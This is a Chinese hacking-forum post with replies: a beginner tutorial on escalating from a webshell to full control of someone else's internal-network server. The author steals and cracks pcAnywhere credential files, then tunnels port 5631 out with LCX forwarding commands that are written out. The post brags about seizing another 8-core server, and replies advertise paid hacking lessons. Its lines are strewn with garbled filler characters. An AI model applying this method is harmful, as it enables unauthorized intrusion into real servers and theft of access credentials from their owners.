返回列表 发帖

[原创文章] pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
7 @" y: ?: B: @
- S# [0 @# y0 y6 k& n提权方法:pcanywhere+LCX
0 ~3 `# J  ^3 t9 k1 ?' {9 L  G5 X) g# E& M; v) |+ ?* Q
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
+ N2 a5 Y" [+ ?0 q& y* S
1 q6 n7 e' c5 l9 m在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。+ I. Q. P* e) z$ ~  t2 Q
& i. b* u3 Y' [+ l9 e

/ N0 X6 K% a* Q) U! F查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。; n2 J" N/ K% G$ q
( W+ P3 I. [5 d) H, ^" f# e7 f

! Q# ~0 \7 X* Y1 C( d呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。3 V8 x3 L$ S. ?" c- o

9 n' U4 P/ Z+ M- Y6 a: p1 L/ z
( G6 w) u  L! R6 R% J5 A/ x7 z2 c! |- k( A9 \8 L/ i& O6 z
, k' m& T* |: \' z
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
! T( t3 E7 b+ [. g
; k% r8 r* k" R( F5 b# m+ h6 F9 ?0 g" ~4 }+ V( L( |5 u, d8 N
LCX的用法再简单说下:: o( `8 P3 g. Q

0 n- F6 g2 A- n) ?: g8 m1 ^服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)6 C1 }8 F# b0 H1 O1 p7 n7 e9 ^
1 W+ [, i% @0 A4 \  d
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)" k6 h& _% {2 y6 e. `( C

, Z% u, S$ Y2 Y由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
2 d; q: z! u" D; F顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
: e* [6 Y/ m/ v4 U* `* X/ s% B4 Z6 \& S) x

. o$ [$ u$ y: j. i/ h8 A
9 z  h4 D, w; r# _. a
& `* b7 p: H& K; C$ D0 j* S呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。% ^0 \- o. F4 i4 \1 f" Y

8 L7 o0 s5 D; p4 X% V, n! d6 E* p! A6 s

6 o* e5 ?% m; f6 u
. y: ?; W1 o6 n, c4 Z9 T我们本地连接试试,输入我们刚破解的账号密码2 n) B% d  j3 K7 E: l
2 r  F8 T$ P' l6 h& j

) \& u7 [( s+ x/ F呵呵``连接成功,服务器不错,又一个8核^︵^
7 m- H: q* X% t  N1 f
  p. L: t1 p+ t) n4 z7 }3 [8 i* v' L0 Q9 m5 |) Z/ T# z

, x8 v3 I" U; W( e" u
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
1

评分人数

  • 柔肠寸断

不错不错。。。你的貌似一直都是内网服务器哈
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

哎。。。。运气不佳```老碰见内网的。。。。

TOP

八核的哟

TOP

顶起。。。。。。。。。
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.

TOP

返回列表